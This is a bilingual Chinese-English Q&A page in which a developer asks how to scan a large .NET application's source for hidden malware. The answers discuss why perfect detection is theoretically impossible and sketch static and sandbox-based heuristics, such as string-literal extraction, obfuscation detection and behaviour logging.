如何检测.Net代码中的恶意软件实现 [英] How to Detect Malware Implementation in .Net Code

问题描述

你好，



我已经获得了大量量身定制的.Net Windows应用程序的源代码，我需要扫描它并证明它是安全的和无恶意软件。是否有任何工具实际扫描.Net源代码以检测可能的嵌入/隐藏恶意软件代码？



逻辑策略可能是寻找发送敏感的代码应用程序之外的数据（例如通过电子邮件，WCF，Web服务等），对吗？如果没有，我还应该寻找什么呢？



任何建议都将不胜感激...



问候，



Ziad。

Hello,

I have been given the source code of a large tailor made .Net Windows Application and im required to scan through it and certify that it is safe and Malware-free. Are there any tools out there that actually scan .Net source code to detect possible embedded/hidden Malware code?

A logical strategy may be to look for code that sends sensitive data outside the application (such as by email, WCF, web services...etc), correct? If not, what else should i look for?

Any advice would be greatly appreciated...

Regards,

Ziad.

推荐答案

严格来说，原则上是不可能的。要证明说明一个矛盾的例子就足够了吧？



关于发送敏感信息的例子非常好。这个标准还不够，但如果发出这样的数据，这就是一个问题。假设检测到这种情况的检测。有非恶意应用程序旨在发送此类信息，例如，出于支持和错误修复的目的，错误信息（希望基于客户的同意）发送给公司（丑陋的事实是，客户无法描述他们所看到的，相反，他们宁愿告诉他们认为他们看到了什么，这通常不是真的。因此，恶意活动的检测器会将合法程序检测为恶意程序。



删除文件的尝试是否应视为恶意？显然不是，因为我们应该能够实现文件指挥官。



可以说，让我们要求只有在用户同意的情况下才允许进行非恶意操作。问题是：理论上不可能根据算法评估进行计算。为什么？计算机科学有一个基本结果（可计算性理论， http://en.wikipedia.org/wiki/Computability_theory [ ^ ]）：通常不可能预测 Turing-complete 程序将在任意长时间内完成。同样，一个程序可能包含一个供用户同意的代码，但是如何计算程序是否会达到这段代码？探测器肯定会产生误报和漏报。



与此同时，它可能完全无望。在现实生活中，如果探测器可以将所有程序分类为肯定是恶意的，肯定是非恶意的和不确定的，那么它将是有用的。



最大的问题是定义要考虑的内容恶意 - 我对这种前景持怀疑态度。

Strictly speaking, it is not possible in principle. To proof illustrate that, one contradictory example is enough, right?

The example about sending out sensitive information is very good. This criteria is not enough, but if such data is sent out, this is a problem. Suppose the detection of this situation is detected. There are non-malicious applications designed to send such information, for example, error information is sent (hopefully based on the customer consent) to the company for the purposes of support and bug fixing (the ugly truth is, the customers are unable to describe what they see, instead they would rather tell what they think they see, which is usually not true). So, the detector of malicious activity will detect legitimate program as malicious.

Is the attempt to delete a file should be considered as malicious? Apparently not, because we should be able to implement file commanders.

On can say, let's demand that a non-malicious operation is only allowed on user's consent. The problem is: it is theoretically impossible to calculate based on the algorithm review. Why? There is a fundamental result of computer science (computability theory, http://en.wikipedia.org/wiki/Computability_theory[^]): it is impossible in general to predict what a Turing-complete program will do over an arbitrarily long time. Likewise, a program may contain a code for user's consent, but how to compute that the program will ever reach this fragment of code? The detector is bound to produce false positives and false negatives.

At the same time, it may be note completely hopeless. In real life a detector would be useful if it could classify all programs into certainly malicious, certainly non-malicious and uncertain.

The biggest problem is definition of what to consider malicious -- I'm pretty skeptical about such a prospect.

这是一个很好的问题。我可以说，支持协助，支持或（半）自动化安全审查（尤其是智能手机应用程序）的工具存在巨大差距。



我梦想有一种能够按危险对命令，功能和文字进行分类，分组和排序的工具。也许通过使用一些本体和自然语言处理，一个插件系统和一个社区驱动的启发式ai等...



实际上我们已经拥有了所有这些。



有英语语言的本体框架和nlp处理器项目。在Android上，众所周知的安全套件会注意阅读联系人，发送消息权限等应用程序的间谍功能，并至少警告您。还有更多的wordpress插件，扫描源邪恶eval（）和其他已知的有害功能。我们有静态代码分析，例如适当的逃避。更进一步，您将获得缺少输入清理的检查。如果我们创建一个包含已知库的哈希值（而不是仅仅在项目网站上发布）的数据库，以确保它们没有被泄露（例如从github收集md4和sha1哈希文件，或者使用由版本控制系统生成的哈希） 。检查日期依赖关系（每个软件包系统都这样做）以确保所有安全漏洞都已关闭（如secunia所做）。



首先，我将采用抽象语法树解析器（AST）eather for c＃，vb甚至更好的中间语言，收集所有函数名称，并以人类可读的方式列出所有唯一的字符串文字。现在可以轻松地分析此输出的http或其他指示要泄漏数据的连接字符串的关键字。在下一步中，必须对其进行雾化并针对库进行检查。下一步是对数据库中的每个流行语进行风险排名。我们将实现正则表达式匹配来搜索像ipv4，ipv6-addresses这样的模式。



也许我们最终会看到混淆代码，比如base64编码连接字符串（隐藏特洛伊木马在php和js代码中的常用方法）或后门密码。但即使这不是新的，因此可行 - 请参阅具有检测混淆器功能的js beautifier，就像大多数反汇编一样。



通过分析已经优化的代码一个预编译（假设它连接）我们可以很容易地发现分裂的字符串，如'ht'+'tp'



甚至可以教一个启发式算法像saveToDisk这样的函数至少需要对本地存储的写权限，这表示为save和disk。应该报告任何其他功能或外部库的使用。



启发式搜索可以使用经过良好审查和信任的代码进行培训，就像病毒/恶意软件扫描程序一样。事实上，这样的工具只不过是更高提取级别的病毒扫描程序（例如il或c＃代码）



真正的安全审计工具的另一个特点是在沙箱中运行的程序的长期行为分析，其中所有网络流量，所有文件访问都是日志，因此我们知道程序读取我们的联系人或将数据发送到第三方服务器等。



我们可以看到，这都是时间，金钱和专业知识的问题。

This is a great question. And I can say, there is a huge gap of tools supporting that assist, support or (semi) automate security reviews (especially smartphone apps).

I dream of a tool that is able to categorize, group and rank commands, function and literals by danger. maybe by using some ontology and natural language processing, with a plugin system and a community driven heuristic ai and such...

in fact we have all that by now.

there are ontology frameworks and nlp processor projects for the English language out there. on android, the well known security suites watch out for "spy function" of apps like "read contacts, send messages" permissions etc. and at least warn you. further more there are wordpress plugins, that scan the source for "evil" eval() and other known harmful functions. we have static code analysis for e.g. proper escaping. take that further, and you will get checks for missing input sanitization. if we create a database with hash sums (instead of just publishing them on a project website) of known libraries to ensure they have not been compromised (e.g. gather the md4 and sha1 hash files from github, or use hashed generated by the versioning system). check for up do date dependencies (every package system does that) to ensure all security holes are closed (like secunia does).

For a fist step, I would take a abstract syntax tree parser (AST) eather for c#, vb or even better of the intermediate language, geather all function names, and list all unique string literals in a human readable manner. this output can now be easily analysed for "http" or other keywords that indicate a connection string to leak data. in the next step this has to be atomized and checked against a library. next step is to put a "risk ranking" on each buzzword in the database. the we would implement regex matching to search for patterns like ipv4, ipv6-addresses. etc.

maybe we end up by looking into obfuscated code, like base64 encoded connection strings (a common method for hiding Trojans in php and js code) or backdoor passwords. but even this is not new and therefor doable - see js beautifier which has a detect obfuscator capability, like also most disassemble have.

by analysing code that was already optimized by a precompile (assuming it does concatenation) we may easily discover splitted strings like 'ht'+'tp'

it should even be possible to "teach" a heuristic algorithm that a function like "saveToDisk" need at least write permissions for local storage, which is indicated be the words "save" and "disk". any other use of a function or external library should be reported.

the heuristic search could be trained with well reviewed and trusted code, just like a virus/ malware scanner. in fact such tool would be nothing more than a virus scanner on higher extraction level (e.g. il or c# code)

another feature of a real security audit tool would be a long term behaviour analysis of a program run in a sandbox where all network traffic, all file access is log, so we know if the program "reads our contacts" or "send data to 3rd party servers" etc.

As we can see, this is all a question of time, money and expertise.

这篇关于如何检测.Net代码中的恶意软件实现的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！